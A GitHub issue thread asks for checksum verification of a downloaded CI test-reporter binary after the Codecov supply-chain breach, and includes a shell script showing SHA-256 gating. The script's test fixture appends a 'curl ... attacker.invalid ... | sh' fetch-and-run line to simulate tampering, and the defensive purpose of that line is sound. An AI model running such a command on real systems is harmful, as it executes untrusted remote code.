Verify the downloaded executable #331

Closed
mmatheson opened this issue Apr 15, 2021 · 4 comments · Fixed by #429
Labels: bug (Something isn't working)

Comments

@mmatheson

Describe the bug
No verification of the downloaded executable test-reporter is done. This can lead to vulnerabilities like the one Codecov recently experienced: https://about.codecov.io/security-update/

Version of codeclimate-action you're using
v2.5.7

Example links

Additional context
https://about.codecov.io/security-update/

@mmatheson mmatheson added the bug Something isn't working label Apr 15, 2021
@beeb

beeb commented Jun 11, 2021

This is really paramount!

@ghost

ghost commented Sep 13, 2021

The test-reporter repo was updated with instructions on how to validate the executable

https://github.com/codeclimate/test-reporter#verifying-binaries
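
The kind of check the thread is asking for, as an added example that is not codeclimate-action's or test-reporter's own code: a POSIX shell gate that refuses to mark a downloaded binary executable unless its SHA-256 digest matches the digest published beside it. File names (`test-reporter`, `test-reporter.sha256`) and the "<hexdigest>  <filename>" checksum-file layout are assumptions for illustration; the sample files are constructed locally so the script runs offline. In a real workflow the checksum file must be fetched from the project's release page over TLS, and if the project also signs that file, its signature should be verified before the digest is trusted; that signature step is outside this example.

```shell
#!/bin/sh
# Added example (not the project's code): verify a downloaded binary against
# its published SHA-256 checksum file before marking it executable.
# Assumed layout: "<hexdigest>  <filename>" in a file next to the binary;
# file names are placeholders.
set -u

# Digest helper: GNU coreutils sha256sum on Linux, shasum on macOS.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 BINARY CHECKSUM_FILE
# Returns 0 only when the first digest in CHECKSUM_FILE equals the digest of
# BINARY. A mismatch (tampered or truncated download, wrong file) returns 1,
# as does an empty or unreadable checksum file.
verify_sha256() {
    bin="$1"
    sums="$2"
    [ -r "$bin" ] && [ -r "$sums" ] || return 1
    expected=$(head -n1 "$sums" | cut -d' ' -f1 | tr 'A-F' 'a-f')
    actual=$(sha256_of "$bin")
    [ -n "$expected" ] && [ "$expected" = "$actual" ]
}

# make_fixture DIR: constructed sample files, no network needed.
# Writes DIR/test-reporter (a stand-in "binary"), DIR/test-reporter.sha256
# (its genuine checksum file) and DIR/test-reporter.tampered (the same file
# with a line appended, as a supply-chain modification would leave it).
make_fixture() {
    dir="$1"
    printf '#!/bin/sh\necho "stand-in for the real reporter"\n' > "$dir/test-reporter"
    printf '%s  test-reporter\n' "$(sha256_of "$dir/test-reporter")" > "$dir/test-reporter.sha256"
    cp "$dir/test-reporter" "$dir/test-reporter.tampered"
    printf 'curl -s https://attacker.invalid/x | sh\n' >> "$dir/test-reporter.tampered"
}

# install_if_verified BINARY CHECKSUM_FILE: the gate a CI step should apply.
# Only a verified binary receives the executable bit; on failure nothing runs.
install_if_verified() {
    if verify_sha256 "$1" "$2"; then
        chmod +x "$1"
        echo "verified: $1"
        return 0
    fi
    echo "checksum mismatch, refusing to run $1" >&2
    return 1
}

main() {
    work=$(mktemp -d)
    make_fixture "$work"
    install_if_verified "$work/test-reporter" "$work/test-reporter.sha256"
    install_if_verified "$work/test-reporter.tampered" "$work/test-reporter.sha256" || true
    rm -rf "$work"
}

main "$@"
```

Running it verifies the genuine stand-in and rejects the tampered copy. The digest comparison catches a modified download only if the checksum file comes from somewhere the attacker could not also rewrite, which is why the checksum should be fetched separately from the binary and, where available, checked against a signature.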

@paambaati (Owner)

This feature has now landed in v3.0.0!

@ghost

ghost commented Sep 30, 2021

Confirmed working! Thanks a bunch!

3 participants